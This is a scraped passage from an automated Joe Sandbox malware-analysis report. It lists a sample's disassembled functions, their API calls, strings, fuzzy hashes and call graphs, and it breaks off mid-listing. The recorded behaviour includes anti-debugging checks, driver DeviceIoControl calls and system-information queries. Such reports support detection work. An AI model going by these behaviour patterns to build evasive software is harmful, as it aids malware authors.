                                                                                                                                                                      • Associated: 00000007.00000002.1642930951.00000000005D8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642962386.00000000005D9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642993229.00000000005E3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_400000_5A89.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocHeap_free_malloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2734353464-0
                                                                                                                                                                      • Opcode ID: 61bd32a45012f4549645fe48891dd8308e4f95b5e458f4dd8b53c8a68d482d80
                                                                                                                                                                      • Instruction ID: a2c5e14f3abab3b46456315dd7ab5dacecc649fa4160e809dee26b10f61197ba
                                                                                                                                                                      • Opcode Fuzzy Hash: 61bd32a45012f4549645fe48891dd8308e4f95b5e458f4dd8b53c8a68d482d80
                                                                                                                                                                      • Instruction Fuzzy Hash: ED11C4B25055117BCB313BB5BC05A5B3794ABC13A0F21853BFB08BB2E0DE3C8941969D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040605C Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd.LIBCMT ref: 00406068
                                                                                                                                                                        • Part of subcall function 00403FDD: __getptd_noexit.LIBCMT ref: 00403FE0
                                                                                                                                                                        • Part of subcall function 00403FDD: __amsg_exit.LIBCMT ref: 00403FED
                                                                                                                                                                      • __getptd.LIBCMT ref: 0040607F
                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 0040608D
                                                                                                                                                                      • __lock.LIBCMT ref: 0040609D
                                                                                                                                                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 004060B1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1642537882.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.1642485181.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642537882.0000000000413000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642843006.00000000005D3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642890014.00000000005D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642930951.00000000005D8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642962386.00000000005D9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642993229.00000000005E3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_400000_5A89.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 938513278-0
                                                                                                                                                                      • Opcode ID: e5211ff83136d9507b2247b2a74555fc54ae9f480270c4925cb011943c06de8e
                                                                                                                                                                      • Instruction ID: 5e38fd5a7783f07dc4d44450aeaf55c1058efbae2ac8fa8ede39d4278c6af2c9
                                                                                                                                                                      • Opcode Fuzzy Hash: e5211ff83136d9507b2247b2a74555fc54ae9f480270c4925cb011943c06de8e
                                                                                                                                                                      • Instruction Fuzzy Hash: 65F0F631A413149AD630FF799802B4E37A06F00329F12013FF506B72D2CB7C29109A5E
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00402005 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1642537882.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.1642485181.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642537882.0000000000413000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642843006.00000000005D3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642890014.00000000005D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642930951.00000000005D8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642962386.00000000005D9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642993229.00000000005E3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_400000_5A89.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __calloc_crt
                                                                                                                                                                      • String ID: ]$@2]
                                                                                                                                                                      • API String ID: 3494438863-696408521
                                                                                                                                                                      • Opcode ID: d788793a4143e2976dff34cccf0d0af9fa94b85346b28f81e467cfb542c58a8f
                                                                                                                                                                      • Instruction ID: 13879186c938b816cccb7c625f1de466437b846b3ba68b322c833f163aa339da
                                                                                                                                                                      • Opcode Fuzzy Hash: d788793a4143e2976dff34cccf0d0af9fa94b85346b28f81e467cfb542c58a8f
                                                                                                                                                                      • Instruction Fuzzy Hash: 8B11043160531257E7349A1DBD4C7662BD5B799324B14423BE302EB3E0E6B8C882D248
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 005CB9C0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • EndUpdateResourceW.KERNEL32(00000000,00000000), ref: 005CB9EB
                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 005CB9F5
                                                                                                                                                                      • GetServiceKeyNameA.ADVAPI32(00000000,tokijotinelazusoforiyoruki,?,406429BE), ref: 005CBA1F
                                                                                                                                                                      Strings
                                                                                                                                                                      • tokijotinelazusoforiyoruki, xrefs: 005CBA18
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1642537882.0000000000413000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.1642485181.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642537882.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642843006.00000000005D3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642890014.00000000005D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642930951.00000000005D8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642962386.00000000005D9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642993229.00000000005E3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_400000_5A89.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: NamePrivateProfileResourceServiceStringUpdateWrite
                                                                                                                                                                      • String ID: tokijotinelazusoforiyoruki
                                                                                                                                                                      • API String ID: 2106879505-666090400
                                                                                                                                                                      • Opcode ID: d28d63d1975e20926047f6c6cf6b743d18ca73b661b14c93c2e538364fd9876c
                                                                                                                                                                      • Instruction ID: a292765ebe76e924173564f9a3cee30b9e114d1feedb85776fb342c30718c7c3
                                                                                                                                                                      • Opcode Fuzzy Hash: d28d63d1975e20926047f6c6cf6b743d18ca73b661b14c93c2e538364fd9876c
                                                                                                                                                                      • Instruction Fuzzy Hash: DC012B711412045AE3306F5CDD47F597F64F754B10F40061FE754AA1D1E77058448666
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040C2D5 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040C309
                                                                                                                                                                      • __isleadbyte_l.LIBCMT ref: 0040C33C
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,?,00000000,00000000,?,?,?), ref: 0040C36D
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,00000001,00000000,00000000,?,?,?), ref: 0040C3DB
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1642537882.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.1642485181.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642537882.0000000000413000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642843006.00000000005D3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642890014.00000000005D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642930951.00000000005D8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642962386.00000000005D9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642993229.00000000005E3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_400000_5A89.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3058430110-0
                                                                                                                                                                      • Opcode ID: e381b68ca43b2ca8e19911e7e9a364142e079a93569dd4c22e94d42cc7b28f61
                                                                                                                                                                      • Instruction ID: f79a345fd2c00daf73f727bc6b056d9c0055be0ebb95a4779142a6a20b339e70
                                                                                                                                                                      • Opcode Fuzzy Hash: e381b68ca43b2ca8e19911e7e9a364142e079a93569dd4c22e94d42cc7b28f61
                                                                                                                                                                      • Instruction Fuzzy Hash: 1831A431910246EFDF20DFA4C8C096E3BA5AF01310F1486BEE861AB2D1D734DD51EB59
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 005CBA50 Relevance: 6.0, APIs: 4, Instructions: 50pipetimeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 005CB990: HeapAlloc.KERNEL32(00000000,00000000,00000000,005CBA80), ref: 005CB9A7
                                                                                                                                                                        • Part of subcall function 005CB990: LoadLibraryA.KERNEL32(00000000), ref: 005CB9AF
                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 005CBA8B
                                                                                                                                                                      • ReadEventLogA.ADVAPI32(00000000,00000000,00000000,?,00000000,?,?), ref: 005CBAA8
                                                                                                                                                                      • CreateNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005CBABE
                                                                                                                                                                      • FileTimeToLocalFileTime.KERNEL32 ref: 005CBADE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1642537882.0000000000413000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.1642485181.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642537882.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642843006.00000000005D3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642890014.00000000005D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642930951.00000000005D8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642962386.00000000005D9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642993229.00000000005E3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_400000_5A89.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileTime$AllocCreateEnvironmentEventFreeHeapLibraryLoadLocalNamedPipeReadStrings
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1576183245-0
                                                                                                                                                                      • Opcode ID: 076db8a4f83312987f1905256bfbc6c88339437fdf71772ccd15141eed5dfc8e
                                                                                                                                                                      • Instruction ID: f214a78d01e731fb2b2b09246ad61fa8e859b9e9d03b3fea04ee85f7849c3906
                                                                                                                                                                      • Opcode Fuzzy Hash: 076db8a4f83312987f1905256bfbc6c88339437fdf71772ccd15141eed5dfc8e
                                                                                                                                                                      • Instruction Fuzzy Hash: 90012D712093059FD360DF54DC8AF9AB7A8FBA8705F00451FF2558B1A0D770654C9BA7
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 005CCC9B Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1642537882.0000000000413000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.1642485181.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642537882.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642843006.00000000005D3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642890014.00000000005D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642930951.00000000005D8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642962386.00000000005D9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.1642993229.00000000005E3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_400000_5A89.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                                                      • Opcode ID: 843931e506ad9f7667999f9533ecfb8930c9daf0a1febf59d810d17d1cd26479
                                                                                                                                                                      • Instruction ID: 7659e4ef46eb3dc854fa885a691a500da997daefc6b5927b0d7f1199e0bd93e6
                                                                                                                                                                      • Opcode Fuzzy Hash: 843931e506ad9f7667999f9533ecfb8930c9daf0a1febf59d810d17d1cd26479
                                                                                                                                                                      • Instruction Fuzzy Hash: 10117B3200018EBFCF125EC8DD05DEE3F22BB59394B598419FA2D98031D332C9B2AB81
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:15.6%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                      Total number of Nodes:27
                                                                                                                                                                      Total number of Limit Nodes:0

                                                                                                                                                                      Callgraph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      • Opacity -> Relevance
                                                                                                                                                                      • Disassembly available
                                                                                                                                                                      callgraph 0 Function_006A1E69 1 Function_006949ED 2 Function_006970EC 36 Function_0069592F 2->36 3 Function_006957EE 62 Function_0069571F 3->62 4 Function_0069C2EE 5 Function_006943E0 8 Function_00694A78 5->8 14 Function_00696948 5->14 25 Function_00696950 5->25 6 Function_0069E662 7 Function_006C5FE7 7->2 30 Function_00696254 7->30 32 Function_006959A8 7->32 38 Function_006C5FAA 7->38 8->14 9 Function_00699BFC 12 Function_00695DF0 9->12 10 Function_0069C1FC 10->0 49 Function_006A1E88 10->49 11 Function_00695AF1 11->62 13 Function_00695848 27 Function_0069B255 13->27 13->30 41 Function_00695926 13->41 58 Function_00696299 13->58 61 Function_0069591D 13->61 64 Function_00696610 13->64 15 Function_0069CF4A 16 Function_00699BCC 17 Function_0069C34F 18 Function_0069C4C0 19 Function_00696640 34 Function_00696CAD 19->34 54 Function_00696B02 19->54 19->62 20 Function_0069D2C2 35 Function_00694A2F 20->35 37 Function_0069452F 20->37 21 Function_00694A42 21->36 22 Function_006951D9 23 Function_00694ADD 44 Function_00699ABF 23->44 24 Function_006950D0 39 Function_0069CFA1 25->39 26 Function_0069C550 26->18 53 Function_0069C500 26->53 28 Function_00696155 28->35 28->37 29 Function_00694A55 29->1 29->21 29->35 31 Function_0069C3D6 31->31 32->19 32->36 33 Function_006C6028 33->3 33->7 33->13 33->26 33->29 33->32 33->33 33->35 33->37 43 Function_006957BA 33->43 48 Function_006957B4 33->48 52 Function_00696481 33->52 56 Function_00694A87 33->56 60 Function_0069579A 33->60 34->20 34->54 35->36 36->13 36->43 36->52 36->56 36->62 37->14 37->62 38->2 38->11 38->26 38->30 38->32 38->36 38->38 39->39 40 Function_006956A4 40->64 41->44 42 Function_0069C338 42->10 43->62 45 Function_0069D030 45->40 45->62 65 Function_00695716 45->65 46 Function_006962B0 46->4 46->8 46->26 46->42 55 Function_0069C305 46->55 63 Function_0069C31E 46->63 47 Function_0069C333 50 Function_0069D20D 50->35 50->37 51 Function_0069C28C 51->8 51->10 54->5 54->20 54->24 54->28 54->45 54->50 59 Function_0069D199 54->59 55->0 56->1 56->9 56->16 56->23 56->30 56->35 56->58 57 Function_0069B707 57->22 57->30 57->58 59->35 59->37 61->44 62->64 65->40

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 00694A87 Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • ___sbh_find_block.LIBCMT ref: 00694AB0
                                                                                                                                                                      • ___sbh_free_block.LIBCMT ref: 00694ABF
                                                                                                                                                                      • RtlFreeHeap.NTDLL(00000000,?,0081B8C0,0000000C,00695999,00000000,?,?,006959B0,?,006C5FF8,0081C690,0000000C,006C60AA,?,00000000), ref: 00694AEF
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,006959B0,?,006C5FF8,0081C690,0000000C,006C60AA,?,00000000), ref: 00694B00
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3833746976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.3833746976.0000000000824000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.3833746976.000000000083C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.3833746976.0000000000843000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_5A89.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFreeHeapLast___sbh_find_block___sbh_free_block
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2661975262-0
                                                                                                                                                                      • Opcode ID: 78909d6c4936e91804b8b1daa8b3149c3f077c8927f69aac5a87e0b9846f729e
                                                                                                                                                                      • Instruction ID: d2f168f1c234fbc1eb0db84b56c896eb6ac808ee96d716f7e41c0537d1ba3495
                                                                                                                                                                      • Opcode Fuzzy Hash: 78909d6c4936e91804b8b1daa8b3149c3f077c8927f69aac5a87e0b9846f729e
                                                                                                                                                                      • Instruction Fuzzy Hash: E501A271945301AADF60BF74AC06F9F3B6EAF00765F10000DF510A6A99CE788A42DA68
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 006C5FE7 Relevance: 4.5, APIs: 3, Instructions: 19COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 26 6c5fe7-6c601b call 696254 call 6959a8 call 6c5faa call 6970ec
                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd.LIBCMT ref: 006C5FF3
                                                                                                                                                                        • Part of subcall function 006959A8: __getptd_noexit.LIBCMT ref: 006959AB
                                                                                                                                                                        • Part of subcall function 006959A8: __amsg_exit.LIBCMT ref: 006959B8
                                                                                                                                                                      • __endthreadex.LIBCMT ref: 006C6003
                                                                                                                                                                        • Part of subcall function 006C5FAA: __IsNonwritableInCurrentImage.LIBCMT ref: 006C5FBD
                                                                                                                                                                        • Part of subcall function 006C5FAA: __getptd_noexit.LIBCMT ref: 006C5FCD
                                                                                                                                                                        • Part of subcall function 006C5FAA: __freeptd.LIBCMT ref: 006C5FD7
                                                                                                                                                                        • Part of subcall function 006C5FAA: RtlExitUserThread.NTDLL(?,?,006C6008,00000000), ref: 006C5FE0
                                                                                                                                                                        • Part of subcall function 006C5FAA: __XcptFilter.LIBCMT ref: 006C6014
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3833746976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.3833746976.0000000000824000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.3833746976.000000000083C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.3833746976.0000000000843000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_5A89.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd_noexit$CurrentExitFilterImageNonwritableThreadUserXcpt__amsg_exit__endthreadex__freeptd__getptd
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1003287236-0
                                                                                                                                                                      • Opcode ID: a89283c4aba3c99d0b47ffbdad6a7f8d104b49c00d8e382c7f34c9978f4e5ab4
                                                                                                                                                                      • Instruction ID: d5ace2e70bc2d3c52d8088d9385be9d0b72b17dae02ad738aec28fd26f28fbfb
                                                                                                                                                                      • Opcode Fuzzy Hash: a89283c4aba3c99d0b47ffbdad6a7f8d104b49c00d8e382c7f34c9978f4e5ab4
                                                                                                                                                                      • Instruction Fuzzy Hash: 65E0ECB5954605DFEB58ABA0C806E7E776AEF48311F20404CF1029B6A2CA75A984DF25
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                      Function 00694A78 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 006999D2
                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006999E7
                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(006D9C6C), ref: 006999F2
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 00699A0E
                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 00699A15
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3833746976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.3833746976.0000000000824000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.3833746976.000000000083C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.3833746976.0000000000843000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_5A89.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2579439406-0
                                                                                                                                                                      • Opcode ID: 5e4f057abdc76eb51c15de7ff52c5ade2ab544b117bf26ad20e1fd5a877e97fd
                                                                                                                                                                      • Instruction ID: dcde4617195335d5d3c577808627ec0208f30a12f7e2c262b8b14ad4a69ab474
                                                                                                                                                                      • Opcode Fuzzy Hash: 5e4f057abdc76eb51c15de7ff52c5ade2ab544b117bf26ad20e1fd5a877e97fd
                                                                                                                                                                      • Instruction Fuzzy Hash: F021E0B4902305DFCB91DF69FD856447BA9FB88360F10681AF509833A0EFB059828F35
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:7.1%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                      Signature Coverage:6.1%
                                                                                                                                                                      Total number of Nodes:310
                                                                                                                                                                      Total number of Limit Nodes:5
                                                                                                                                                                      execution_graph 4607 409e81 4610 40537d 4607->4610 4608 409e9f 4609 40299a 8 API calls 4609->4610 4610->4608 4610->4609 4611 40e9a4 8 API calls 4610->4611 4611->4610 4680 404dc4 HeapAlloc 4634 408146 4635 4081d7 4634->4635 4636 408203 SetFilePointer 4635->4636 4637 4040d7 ReadFile 4636->4637 4638 4040fa 4636->4638 4637->4638 4639 40af49 4640 40b349 4639->4640 4641 4078cc 4640->4641 4642 401f06 GetTickCount 4640->4642 4643 40b358 4642->4643 4447 40e24c 4448 40e1d7 4447->4448 4450 409b06 4447->4450 4451 40e9cc 4450->4451 4453 407ea6 4450->4453 4456 404753 4450->4456 4454 408e10 4453->4454 4461 404b6e 4454->4461 4458 401db8 4456->4458 4457 40e95d 4458->4457 4483 402d2d 4458->4483 4462 40c1d3 4461->4462 4469 404b7e 4461->4469 4478 40aba2 4462->4478 4464 404da9 4470 40dfb7 4464->4470 4465 40b6f9 4474 40ccc4 4465->4474 4468 404dba 4468->4454 4469->4464 4469->4465 4471 40dfec 4470->4471 4472 40e14a DeviceIoControl 4471->4472 4473 40e1d7 4472->4473 4473->4468 4475 402ec4 4474->4475 4476 40ccf3 4474->4476 4475->4468 4476->4475 4477 40dbaf DeviceIoControl 4476->4477 4477->4475 4479 40abbc 4478->4479 4480 40abdb SetFilePointer 4479->4480 4481 40c612 WriteFile 4480->4481 4482 4021e9 4480->4482 4481->4482 4482->4468 4488 402d3d 4483->4488 4490 408944 4483->4490 4487 402d57 4495 40b485 4487->4495 4488->4487 4491 4090aa 4488->4491 4498 4081ca 4490->4498 4492 4090df 4491->4492 4493 40923d DeviceIoControl 4492->4493 4494 4092c7 4493->4494 4494->4487 4496 40b4cd 4495->4496 4497 40b59b DeviceIoControl 4496->4497 4497->4490 4499 4081d7 4498->4499 4500 408203 SetFilePointer 4499->4500 4501 4040d7 ReadFile 4500->4501 4502 4040fa 4500->4502 4501->4502 4560 402ecd 4562 408e10 4560->4562 4561 404b6e 4 API calls 4561->4562 4562->4561 4612 40e48d NtQuerySystemInformation 4613 40e4b0 4612->4613 4614 408cf4 4612->4614 4614->4612 4503 404e4e 4505 401db8 4503->4505 4504 40e95d 4505->4504 4506 402d2d 4 API calls 4505->4506 4507 401dcf 4506->4507 4685 4063ce 4686 4063d2 4685->4686 4687 405c4c 8 API calls 4686->4687 4688 4063d7 4687->4688 4689 405312 4 API calls 4688->4689 4692 4025ff 4688->4692 4689->4692 4690 40a943 ExitProcess 4691 40cd02 4690->4691 4692->4690 4563 4040d0 ReadFile 4564 4040fa 4563->4564 4644 408951 4645 408962 CreateFileA DeviceIoControl 4644->4645 4646 